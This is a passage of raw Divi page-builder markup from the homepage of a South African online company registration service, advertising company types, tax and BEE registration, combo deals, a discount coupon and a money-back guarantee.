max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|48px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Call to Action\" _builder_version=\"3.22.3\" box_shadow_style=\"preset2\" custom_padding=\"3px|0px|43px|0px|false|false\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"29px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong>Select the company you require below or refer to menu above</strong></span><span style=\"font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\"><br /> </span></strong></span></h1>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" _builder_version=\"3.26.6\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" custom_margin=\"|||\" custom_padding=\"0|15px|0px|14px|false|false\"][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background__hover_enabled=\"on\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\"][et_pb_cta title=\"Private Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" hover_enabled=\"0\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#0c71c3\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.26.6\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" hover_enabled=\"0\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_text_color=\"rgba(0,0,0,0.39)\" button_bg_color=\"#ea008c\" button_bg_enable_color=\"on\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_cta title=\"Professional company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"800ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p class=\"\"><strong>Business Professionals  such as </strong><strong>Accountants, Lawyers and Doctors practising in a company</strong><span style=\"color: #ffffff;\"><strong>a</strong></span></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_cta title=\"Shareholder Role\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"1000ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|700|||||||\" button_icon=\"%%144%%\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Product page\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.11)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"73%\" background_color_gradient_end_position=\"99%\" box_shadow_style=\"preset2\" custom_padding=\"6px|0px|22px|0px|false|false\"][et_pb_row column_structure=\"1_2,1_2\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"30px|0px|14px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.2.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"color: #0c71c3; font-family: inherit; font-weight: normal;\"><strong>Most Popular<br /></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|off|off\" _builder_version=\"3.2.2\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\">Customise your requirement and SAVE</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"3px\" border_color_all=\"#ffffff\" border_style_all=\"none\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"||20px|\" custom_padding=\"20px|20px||20px\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_shop type=\"best_selling\" posts_number=\"9\" columns_number=\"3\" orderby=\"popularity\" sale_badge_color=\"rgba(255,35,83,0.69)\" icon_hover_color=\"#2fa318\" hover_overlay_color=\"rgba(124,218,36,0.23)\" hover_icon=\"%%45%%\" admin_label=\"Featured page\" _builder_version=\"3.26.3\" title_font=\"|700|||||||\" title_font_size=\"18px\" title_line_height=\"1.1em\" price_font=\"Open Sans|600|on||||||\" price_text_color=\"#0c71c3\" price_font_size=\"18px\" price_text_shadow_style=\"preset4\" custom_padding=\"20px|||10px\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Save\" url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" url_new_window=\"on\" use_icon=\"on\" font_icon=\"%%155%%\" icon_color=\"#0c71c3\" use_circle=\"on\" content_max_width=\"471px\" use_icon_font_size=\"on\" disabled_on=\"on|off|off\" _builder_version=\"3.23.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">Get a</span> <strong><span style=\"color: #800080;\">25%</span></strong> <span style=\"color: #000000;\">discount on your first purchase</span> <strong><span style=\"color: #800080;\"></span></strong></p>\n<p><span style=\"color: #000000;\">Use the coupon code</span> <strong><span style=\"color: #800080;\">customise</span></strong> <span style=\"color: #000000;\">on the checkout page</span></p>[/et_pb_blurb][et_pb_blurb title=\"Money Back Guarantee\" url_new_window=\"on\" image=\"https://companyregistration.online/wp-content/uploads/2019/07/Money-Back-Guarantee.png\" content_max_width=\"471px\" disabled_on=\"on|off|off\" _builder_version=\"3.26.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_translate=\"84px|-67px\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">If we don\'t deliver within a reasonable time you may cancel at anytime.</span></p>\n<p><span style=\"color: #000000;\">NB: The CIPC and SARS may exceed their delivery times</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#f7f7f7\" background_color_gradient_end=\"#ffffff\" custom_padding=\"21px|0px|36px|0px|false|false\" bottom_divider_style=\"waves2\" bottom_divider_color=\"rgba(0,0,0,0.09)\" bottom_divider_height=\"55px\" bottom_divider_flip=\"vertical\" bottom_divider_arrangement=\"above_content\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0|0px|12px|0px|false|false\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.74\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"font-family: inherit; font-weight: normal;\"><strong><span style=\"color: #0c71c3;\">Other Services</span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|38px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/maintaning-our-company/\" use_icon=\"on\" font_icon=\"%%173%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"maintaining your company\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_translate=\"101px|-38px\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"200ms\" animation_starting_opacity=\"10%\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/maintaning-our-company/\">Maintaining Your Company</a></strong></h3>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/bee-requirements/\" use_icon=\"on\" font_icon=\"%%170%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"BEEE Requirements\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/bee-requirements/\">Bee Requirements</a></strong></h3>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/business-tools/\" use_icon=\"on\" font_icon=\"%%176%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Business Tools\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_translate=\"-102px|2px\" transform_skew=\"3deg|3deg\" 